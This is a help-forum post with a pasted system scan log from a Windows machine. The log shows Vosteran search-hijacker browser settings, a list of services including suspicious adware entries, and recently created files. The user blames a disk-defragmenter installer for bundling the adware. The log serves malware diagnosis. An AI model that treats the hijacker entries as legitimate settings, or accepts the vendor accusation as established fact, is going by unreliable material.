FF - user.js: extensions.nspdlsd.cd - 2XzuyEtN2Y1L1QzuyEyEtAyB0EyCtDzy0BtByCyE0EyC0E0CtN0D0Tzu0SzytDtAtN1L2XzutBtFtBtCtFyBtFtCtN1L1CzutCyEtBzytDyD1V1RtN1L1G1B1V1N2Y1L1Qzu2StB0AzyzztDyDzy0AtGyBzyyCyBtG0F0F0CyBtG0EyBzy0EtGtDyBtA0C0C0B0BzzyEyCtDyC2QtN1M1F1B2Z1V1N2Y1L1Qzu2StCtA0AzztDzzyEyDtG0FtCyByBtG0Dzz0A0BtGzzzy0C0BtGtCtBtBzytA0FtAtAyBtBtDzy2Q
.
.
.
.
FF - user.js: extensions.srchvstrn.hmpg - true
FF - user.js: extensions.srchvstrn.hmpgUrl - hxxp://Vosteran.com/?f=1&a=vst_secureddownload_14_52_ch&cd=2XzuyEtN2Y1L1QzuyEyEtAyB0EyCtDzy0BtByCyE0EyC0E0CtN0D0Tzu0StCtDzzyCtN1L2XzutAtFyCtFtCtDtFyBtN1L1CzutCyEtBzytDyD1V1RtN1L1G1B1V1N2Y1L1Qzu2SyB0D0FzytCyDtB0EtGtCyEzz0BtG0D0C0CyBtGtCtA0FyCtGyByEyBtD0F0DyEyEtA0D0FtC2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0A0D0EyD0C0DyE0DtG0Ezy0ByEtGyE0FyD0EtGzytBzyzytGyCyBtD0DtB0DyE0ByDyCtA0D2Q&cr=1408702106&ir=
FF - user.js: extensions.srchvstrn.dfltSrch - true
FF - user.js: extensions.srchvstrn.srchPrvdr - Vosteran
FF - user.js: extensions.srchvstrn.dnsErr - true
FF - user.js: extensions.srchvstrn_i.newTab - true
FF - user.js: extensions.srchvstrn.newTabUrl - hxxp://Vosteran.com/?f=2&a=vst_secureddownload_14_52_ch&cd=2XzuyEtN2Y1L1QzuyEyEtAyB0EyCtDzy0BtByCyE0EyC0E0CtN0D0Tzu0StCtDzzyCtN1L2XzutAtFyCtFtCtDtFyBtN1L1CzutCyEtBzytDyD1V1RtN1L1G1B1V1N2Y1L1Qzu2SyB0D0FzytCyDtB0EtGtCyEzz0BtG0D0C0CyBtGtCtA0FyCtGyByEyBtD0F0DyEyEtA0D0FtC2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0A0D0EyD0C0DyE0DtG0Ezy0ByEtGyE0FyD0EtGzytBzyzytGyCyBtD0DtB0DyE0ByDyCtA0D2Q&cr=1408702106&ir=
FF - user.js: extensions.srchvstrn.tlbrSrchUrl - hxxp://Vosteran.com/?f=3&a=vst_secureddownload_14_52_ch&cd=2XzuyEtN2Y1L1QzuyEyEtAyB0EyCtDzy0BtByCyE0EyC0E0CtN0D0Tzu0StCtDzzyCtN1L2XzutAtFyCtFtCtDtFyBtN1L1CzutCyEtBzytDyD1V1RtN1L1G1B1V1N2Y1L1Qzu2SyB0D0FzytCyDtB0EtGtCyEzz0BtG0D0C0CyBtGtCtA0FyCtGyByEyBtD0F0DyEyEtA0D0FtC2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0A0D0EyD0C0DyE0DtG0Ezy0ByEtGyE0FyD0EtGzytBzyzytGyCyBtD0DtB0DyE0ByDyCtA0D2Q&cr=1408702106&ir=&q=
FF - user.js: extensions.srchvstrn.id - 4437E609B264E6EC
FF - user.js: extensions.srchvstrn.instlDay - 16426
FF - user.js: extensions.srchvstrn.vrsn -
FF - user.js: extensions.srchvstrn.vrsni -
FF - user.js: extensions.srchvstrn_i.vrsnTs - 12:25:49
FF - user.js: extensions.srchvstrn.prtnrId - WSE_Vosteran
FF - user.js: extensions.srchvstrn.prdct - srchvstrn
FF - user.js: extensions.srchvstrn.aflt - vst_secureddownload_14_52_ch
FF - user.js: extensions.srchvstrn_i.smplGrp - none
FF - user.js: extensions.srchvstrn.tlbrId -
FF - user.js: extensions.srchvstrn.instlRef - 142905_c
FF - user.js: extensions.srchvstrn.dfltLng -
FF - user.js: extensions.srchvstrn.appId - {4CB3598A-82E8-4D1F-983F-061238AE696E}
FF - user.js: extensions.srchvstrn.excTlbr - false
FF - user.js: extensions.srchvstrn.cr - 1408702106
FF - user.js: extensions.srchvstrn.cd - 2XzuyEtN2Y1L1QzuyEyEtAyB0EyCtDzy0BtByCyE0EyC0E0CtN0D0Tzu0StCtDzzyCtN1L2XzutAtFyCtFtCtDtFyBtN1L1CzutCyEtBzytDyD1V1RtN1L1G1B1V1N2Y1L1Qzu2SyB0D0FzytCyDtB0EtGtCyEzz0BtG0D0C0CyBtGtCtA0FyCtGyByEyBtD0F0DyEyEtA0D0FtC2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0A0D0EyD0C0DyE0DtG0Ezy0ByEtGyE0FyD0EtGzytBzyzytGyCyBtD0DtB0DyE0ByDyCtA0D2Q
FF - user.js: extensions.srchvstrn.AL - 4
.
user_pref(extensions.autoDisableScopes,14);
============= SERVICES / DRIVERS ===============
.
R1 avgtp;avgtp;C:\windows\System32\drivers\avgtpx64.sys [2013-8-21 49952]
R1 NNSNAHSL;Network Activity Hook Server LightWeight Filter Driver;C:\windows\System32\drivers\NNSNAHSL.sys [2014-12-31 48400]
R2 NanoServiceMain;Panda Protection Service;C:\Program Files (x86)\Panda Security\Panda Cloud Antivirus\PSANHost.exe [2015-2-26 142584]
R2 PSUAService;Panda Product Service;C:\Program Files (x86)\Panda Security\Panda Cloud Antivirus\PSUAService.exe [2015-2-26 38136]
R3 RTL8167;Realtek 8167 NT Driver;C:\windows\System32\drivers\Rt64win7.sys [2010-9-15 215040]
S1 NNSALPC;NNSALPC;C:\windows\System32\drivers\NNSAlpc.sys [2015-2-9 93968]
S1 NNSHTTP;NNSHTTP;C:\windows\System32\drivers\NNSHttp.sys [2015-2-9 202000]
S1 NNSHTTPS;NNSHTTPS;C:\windows\System32\drivers\NNSHttps.sys [2015-2-9 110864]
S1 NNSIDS;NNSIDS;C:\windows\System32\drivers\NNSIds.sys [2015-2-9 116496]
S1 NNSPICC;NNSPICC;C:\windows\System32\drivers\NNSpicc.sys [2015-2-9 99600]
S1 NNSPIHSW;NNSPIHSW;C:\windows\System32\drivers\NNSPihsw.sys [2015-2-9 69904]
S1 NNSPOP3;NNSPOP3;C:\windows\System32\drivers\NNSPop3.sys [2015-2-9 124176]
S1 NNSPROT;NNSPROT;C:\windows\System32\drivers\NNSProt.sys [2015-2-9 299792]
S1 NNSPRV;NNSPRV;C:\windows\System32\drivers\NNSPrv.sys [2015-2-9 166160]
S1 NNSSMTP;NNSSMTP;C:\windows\System32\drivers\NNSSmtp.sys [2015-2-9 113424]
S1 NNSSTRM;NNSSTRM;C:\windows\System32\drivers\NNSStrm.sys [2015-2-9 257296]
S1 NNSTLSC;NNSTLSC;C:\windows\System32\drivers\NNStlsc.sys [2015-2-9 106256]
S1 PSINKNC;PSINKNC;C:\windows\System32\drivers\PSINKNC.sys [2015-2-25 197392]
S2 Apple Mobile Device Service;Apple Mobile Device Service;C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [2015-1-20 77128]
S2 c2cautoupdatesvc;Skype Click to Call Updater;C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [2015-5-1 1394816]
S2 c2cpnrsvc;Skype Click to Call PNR Service;C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [2015-5-1 1772672]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2014-4-12 103608]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2014-4-11 124088]
S2 LVPrcS64;Process Monitor;C:\Program Files\Common Files\LogiShrd\LVMVFM\LVPrcSrv.exe [2009-10-7 191000]
S2 panda_url_filteringService;panda_url_filtering Anti-Phishing Service;C:\ProgramData\Panda Security URL Filtering\Panda_URL_Filteringb.exe -- --> C:\ProgramData\Panda Security URL Filtering\Panda_URL_Filteringb.exe -- [?]
S2 PandaAgent;Panda Devices Agent;C:\Program Files (x86)\Panda Security\Panda Devices Agent\AgentSvc.exe [2014-10-9 66808]
S2 PSINAflt;PSINAflt;C:\windows\System32\drivers\PSINAflt.sys [2015-2-25 163088]
S2 PSINFile;PSINFile;C:\windows\System32\drivers\PSINFile.sys [2015-2-25 121616]
S2 PSINProc;PSINProc;C:\windows\System32\drivers\PSINProc.sys [2015-2-25 124176]
S2 PSINProt;PSINProt;C:\windows\System32\drivers\PSINProt.sys [2015-2-25 133904]
S2 PSINReg;PSINReg;C:\windows\System32\drivers\PSINReg.sys [2015-2-25 107792]
S2 SDScannerService;Spybot-S&D 2 Scanner Service;C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [2013-8-21 1817560]
S2 SDUpdateService;Spybot-S&D 2 Updating Service;C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2013-8-21 1033688]
S2 SDWSCService;Spybot-S&D 2 Security Center Service;C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [2013-8-21 171928]
S2 ServiceUpdater;Network Support Service Updater;C:\windows\SysWOW64\netupdsrv.exe --> C:\windows\SysWOW64\netupdsrv.exe [?]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2014-12-11 315496]
S2 SurfShieldUpdateService;Update Service for SurfShield;"C:\Program Files (x86)\SurfShieldMain\UpdateService.exe" --> C:\Program Files (x86)\SurfShieldMain\UpdateService.exe [?]
S2 vToolbarUpdater18.0.5;vToolbarUpdater18.0.5;C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.0.5\ToolbarUpdater.exe [2014-3-20 1771032]
S3 athrusb;Atheros Wireless LAN USB device driver;C:\windows\System32\drivers\athrxusb.sys [2008-7-28 1075712]
S3 fssfltr;fssfltr;C:\windows\System32\drivers\fssfltr.sys [2014-11-28 58056]
S3 fsssvc;Windows Live Family Safety Service;C:\Program Files (x86)\Windows Live\Family Safety\fsssvc.exe [2014-3-31 1512640]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;C:\windows\System32\ieetwcollector.exe [2015-9-8 114688]
S3 lvpopf64;Logitech POP Suppression Filter;C:\windows\System32\drivers\lvpopf64.sys [2007-5-11 1361952]
S3 LVPr2M64;Logitech LVPr2M64 Driver;C:\windows\System32\drivers\LVPr2M64.sys [2009-10-7 30232]
S3 LVUSBS64;Logitech USB Monitor Filter;C:\windows\System32\drivers\LVUSBS64.sys [2007-5-11 50208]
S3 LVUVC64;Logitech QuickCam Fusion(UVC);C:\windows\System32\drivers\lvuvc64.sys [2007-5-11 3612704]
S3 panda_url_filteringd;panda_url_filteringd driver;C:\ProgramData\Panda Security URL Filtering\Panda_URL_Filteringd.sys [2014-3-19 51288]
S3 PSKMAD;PSKMAD;C:\windows\System32\drivers\PSKMAD.sys [2015-6-6 61712]
S3 RTL8023x64;Realtek 10/100 NIC Family NDIS x64 Driver;C:\windows\System32\drivers\Rtnic64.sys [2009-6-10 51712]
S3 SuperIO;Lenovo ASD HWM Driver;C:\windows\System32\drivers\spio.sys [2009-6-5 11848]
S3 TsUsbFlt;TsUsbFlt;C:\windows\System32\drivers\TsUsbFlt.sys [2011-6-23 59392]
S3 USBAAPL64;Apple Mobile USB Driver;C:\windows\System32\drivers\usbaapl64.sys [2014-7-28 54784]
S3 UsbFltr;WayTech USB Filter Driver;C:\windows\System32\drivers\UsbFltr.sys [2007-4-9 12288]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\windows\System32\Wat\WatAdminSvc.exe [2011-4-2 1255736]
S3 wsvd;wsvd;C:\windows\System32\drivers\wsvd.sys [2009-7-21 121840]
S3 yukonw7;NDIS6.2 Miniport Driver for Marvell Yukon Ethernet Controller;C:\windows\System32\drivers\yk62x64.sys [2009-6-10 389120]
S3 ZDCNDIS6a64;ZDCNDIS Protocol Driver;C:\windows\System32\ZDCNDIS6a64.sys [2011-10-20 41280]
S4 rqpbhevlkc64;rqpbhevlkc64;C:\Program Files\004\rqpbhevlkc64.exe run options=01100010040000000000000000000000 sourceguid=7B0A8368-1A6F-48A5-B236-8BD61816B3F9 --> C:\Program Files\004\rqpbhevlkc64.exe run options=01100010040000000000000000000000 sourceguid=7B0A8368-1A6F-48A5-B236-8BD61816B3F9 [?]
.
=============== Created Last 30 ================
.
2015-09-08 11:42:01 -------- d--h--w- C:\$Windows.~BT
2015-09-08 06:43:30 774656 ----a-w- C:\windows\System32\invagent.dll
2015-09-08 06:43:30 743424 ----a-w- C:\windows\System32\generaltel.dll
2015-09-08 06:43:30 69120 ----a-w- C:\windows\System32\acmigration.dll
2015-09-08 06:43:30 437760 ----a-w- C:\windows\System32\devinv.dll
2015-09-08 06:43:30 1148416 ----a-w- C:\windows\System32\aeinv.dll
2015-09-08 06:43:30 1116672 ----a-w- C:\windows\System32\appraiser.dll
2015-09-08 06:43:29 227328 ----a-w- C:\windows\System32\aepdu.dll
2015-09-08 06:43:29 17344 ----a-w- C:\windows\System32\CompatTelRunner.exe
2015-09-08 06:41:59 815312 ----a-w- C:\Program Files (x86)\Internet Explorer\iexplore.exe
2015-09-08 06:32:54 11745192 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{3C665416-5FAB-42FE-BA2F-A8A0DC018335}\mpengine.dll
2015-09-07 22:56:09 -------- d-----w- C:\Program Files\Common Files\AV
.
==================== Find3M ====================
.
2015-08-26 07:22:17 778440 ----a-w- C:\windows\SysWow64\FlashPlayerApp.exe
2015-08-26 07:22:16 142536 ----a-w- C:\windows\SysWow64\FlashPlayerCPLApp.cpl
2015-07-30 18:06:57 2565120 ----a-w- C:\windows\System32\d3d10warp.dll
2015-07-30 18:06:57 1648128 ----a-w- C:\windows\System32\DWrite.dll
2015-07-30 18:06:57 1180160 ----a-w- C:\windows\System32\FntCache.dll
2015-07-30 18:06:42 41984 ----a-w- C:\windows\System32\lpk.dll
2015-07-30 18:06:39 100864 ----a-w- C:\windows\System32\fontsub.dll
2015-07-30 18:06:35 14336 ----a-w- C:\windows\System32\dciman32.dll
2015-07-30 18:06:34 46080 ----a-w- C:\windows\System32\atmlib.dll
2015-07-30 17:57:30 1987584 ----a-w- C:\windows\SysWow64\d3d10warp.dll
2015-07-30 17:57:30 1251328 ----a-w- C:\windows\SysWow64\DWrite.dll
2015-07-30 17:57:08 70656 ----a-w- C:\windows\SysWow64\fontsub.dll
2015-07-30 17:57:05 10240 ----a-w- C:\windows\SysWow64\dciman32.dll
2015-07-30 17:57:02 34304 ----a-w- C:\windows\SysWow64\atmlib.dll
2015-07-30 17:55:56 25600 ----a-w- C:\windows\SysWow64\lpk.dll
2015-07-30 16:56:07 3208192 ----a-w- C:\windows\System32\win32k.sys
2015-07-30 16:52:53 372736 ----a-w- C:\windows\System32\atmfd.dll
2015-07-30 16:49:55 299520 ----a-w- C:\windows\SysWow64\atmfd.dll
2015-07-20 18:12:45 98304 ----a-w- C:\windows\System32\wudriver.dll
2015-07-20 18:12:45 3154944 ----a-w- C:\windows\System32\wucltux.dll
2015-07-20 18:12:45 192000 ----a-w- C:\windows\System32\wuwebv.dll
2015-07-20 18:12:16 91136 ----a-w- C:\windows\System32\WinSetupUI.dll
2015-07-20 18:12:05 12288 ----a-w- C:\windows\System32\wu.upgrade.ps.dll
2015-07-20 18:12:02 37376 ----a-w- C:\windows\System32\wuapp.exe
2015-07-20 17:56:49 93184 ----a-w- C:\windows\SysWow64\wudriver.dll
2015-07-20 17:56:49 173056 ----a-w- C:\windows\SysWow64\wuwebv.dll
2015-07-20 17:56:08 34816 ----a-w- C:\windows\SysWow64\wuapp.exe
2015-07-16 20:54:49 2724864 ----a-w- C:\windows\System32\mshtml.tlb
2015-07-16 20:54:33 4096 ----a-w- C:\windows\System32\ieetwcollectorres.dll
2015-07-16 20:37:26 66560 ----a-w- C:\windows\System32\iesetup.dll
2015-07-16 20:36:31 48640 ----a-w- C:\windows\System32\ieetwproxystub.dll
2015-07-16 20:36:22 417792 ----a-w- C:\windows\System32\html.iec
2015-07-16 20:36:21 584192 ----a-w- C:\windows\System32\vbscript.dll
2015-07-16 20:35:40 88064 ----a-w- C:\windows\System32\MshtmlDac.dll
2015-07-16 20:26:00 5923328 ----a-w- C:\windows\System32\jscript9.dll
2015-07-16 20:21:50 114688 ----a-w- C:\windows\System32\ieetwcollector.exe
2015-07-16 20:21:47 144384 ----a-w- C:\windows\System32\ieUnatt.exe
2015-07-16 20:21:25 814080 ----a-w- C:\windows\System32\jscript9diag.dll
2015-07-16 20:12:23 968704 ----a-w- C:\windows\System32\MsSpellCheckingFacility.exe
2015-07-16 20:06:43 2724864 ----a-w- C:\windows\SysWow64\mshtml.tlb
2015-07-16 20:00:07 77824 ----a-w- C:\windows\System32\JavaScriptCollectionAgent.dll
2015-07-16 19:51:47 504320 ----a-w- C:\windows\SysWow64\vbscript.dll
2015-07-16 19:51:46 62464 ----a-w- C:\windows\SysWow64\iesetup.dll
2015-07-16 19:50:54 47616 ----a-w- C:\windows\SysWow64\ieetwproxystub.dll
2015-07-16 19:50:38 341504 ----a-w- C:\windows\SysWow64\html.iec
2015-07-16 19:49:37 64000 ----a-w- C:\windows\SysWow64\MshtmlDac.dll
2015-07-16 19:39:20 115712 ----a-w- C:\windows\SysWow64\ieUnatt.exe
2015-07-16 19:38:51 620032 ----a-w- C:\windows\SysWow64\jscript9diag.dll
2015-07-16 19:33:23 1359360 ----a-w- C:\windows\System32\mshtmlmedia.dll
2015-07-16 19:32:53 2125824 ----a-w- C:\windows\System32\inetcpl.cpl
2015-07-16 19:24:03 60416 ----a-w- C:\windows\SysWow64\JavaScriptCollectionAgent.dll
2015-07-16 19:12:42 2427904 ----a-w- C:\windows\System32\wininet.dll
2015-07-16 19:12:39 4520448 ----a-w- C:\windows\SysWow64\jscript9.dll
2015-07-16 19:06:06 2052608 ----a-w- C:\windows\SysWow64\inetcpl.cpl
2015-07-16 19:05:15 1155072 ----a-w- C:\windows\SysWow64\mshtmlmedia.dll
2015-07-16 18:42:02 1951232 ----a-w- C:\windows\SysWow64\wininet.dll
2015-07-15 03:19:57 2004992 ----a-w- C:\windows\System32\msxml6.dll
2015-07-15 03:19:57 1887232 ----a-w- C:\windows\System32\msxml3.dll
2015-07-15 03:14:09 2048 ----a-w- C:\windows\System32\msxml6r.dll
2015-07-15 03:13:59 2048 ----a-w- C:\windows\System32\msxml3r.dll
2015-07-15 02:55:45 1390592 ----a-w- C:\windows\SysWow64\msxml6.dll
2015-07-15 02:55:45 1241088 ----a-w- C:\windows\SysWow64\msxml3.dll
2015-07-15 02:51:14 2048 ----a-w- C:\windows\SysWow64\msxml6r.dll
2015-07-15 02:51:14 2048 ----a-w- C:\windows\SysWow64\msxml3r.dll
2015-07-10 17:51:27 44032 ----a-w- C:\windows\System32\tsgqec.dll
2015-07-10 17:51:19 3722752 ----a-w- C:\windows\System32\mstscax.dll
2015-07-10 17:51:10 158720 ----a-w- C:\windows\System32\aaclient.dll
2015-07-10 17:34:09 36864 ----a-w- C:\windows\SysWow64\tsgqec.dll
2015-07-10 17:34:02 3221504 ----a-w- C:\windows\SysWow64\mstscax.dll
2015-07-10 17:33:50 131584 ----a-w- C:\windows\SysWow64\aaclient.dll
2015-07-09 17:57:57 193536 ----a-w- C:\windows\System32\notepad.exe
2015-07-09 17:57:57 193536 ----a-w- C:\windows\notepad.exe
2015-07-09 17:42:27 179712 ----a-w- C:\windows\SysWow64\notepad.exe
2015-07-04 18:07:11 2087424 ----a-w- C:\windows\System32\ole32.dll
2015-07-04 17:48:36 1414656 ----a-w- C:\windows\SysWow64\ole32.dll
2015-07-01 20:56:03 95680 ----a-w- C:\windows\System32\drivers\ksecdd.sys
2015-07-01 20:56:03 155584 ----a-w- C:\windows\System32\drivers\ksecpkg.sys
2015-07-01 20:49:56 260096 ----a-w- C:\windows\System32\WebClnt.dll
2015-07-01 20:49:53 210944 ----a-w- C:\windows\System32\wdigest.dll
2015-07-01 20:49:47 86528 ----a-w- C:\windows\System32\TSpkg.dll
2015-07-01 20:49:45 29184 ----a-w- C:\windows\System32\sspisrv.dll
2015-07-01 20:49:45 136192 ----a-w- C:\windows\System32\sspicli.dll
2015-07-01 20:49:42 342016 ----a-w- C:\windows\System32\schannel.dll
2015-07-01 20:49:42 28160 ----a-w- C:\windows\System32\secur32.dll
2015-07-01 20:49:41 1216512 ----a-w- C:\windows\System32\rpcrt4.dll
2015-07-01 20:49:23 309760 ----a-w- C:\windows\System32\ncrypt.dll
2015-07-01 20:49:22 315392 ----a-w- C:\windows\System32\msv1_0.dll
2015-07-01 20:49:11 729088 ----a-w- C:\windows\System32\kerberos.dll
2015-07-01 20:49:11 1461760 ----a-w- C:\windows\System32\lsasrv.dll
2015-07-01 20:48:36 102912 ----a-w- C:\windows\System32\davclnt.dll
2015-07-01 20:48:34 44032 ----a-w- C:\windows\System32\cryptbase.dll
2015-07-01 20:48:34 22016 ----a-w- C:\windows\System32\credssp.dll
2015-07-01 20:47:38 31232 ----a-w- C:\windows\System32\lsass.exe
2015-07-01 20:47:18 64000 ----a-w- C:\windows\System32\auditpol.exe
2015-07-01 20:43:51 60416 ----a-w- C:\windows\System32\msobjs.dll
2015-07-01 20:43:37 146432 ----a-w- C:\windows\System32\msaudite.dll
2015-07-01 20:39:24 686080 ----a-w- C:\windows\System32\adtschema.dll
2015-07-01 20:30:43 206848 ----a-w- C:\windows\SysWow64\WebClnt.dll
2015-07-01 20:30:43 172032 ----a-w- C:\windows\SysWow64\wdigest.dll
2015-07-01 20:30:40 65536 ----a-w- C:\windows\SysWow64\TSpkg.dll
.
============= FINISH: 21:00:35.87 ===============

Attached Files

attach.txt (22.1 KB)

Ok this is annoying, i just did a clean install on my laptop and the last thing i installed is the Auslogics Disk Defragmenter suggested by this forum.... it is a good defragmenter but ive downloaded the new version and it installed adwares along with it.... the reason i know is because when i start my PC, a software called boostspeed is installed and i already got it uninstalled and next... google kept asking me to enter captcha due to traffic which i dont know from whre... so how to solve this? damn im so mad!! ive wasted my time formatting and clean and trying to install the updated version of application and this is what i got :( damn Auslogics! :angry: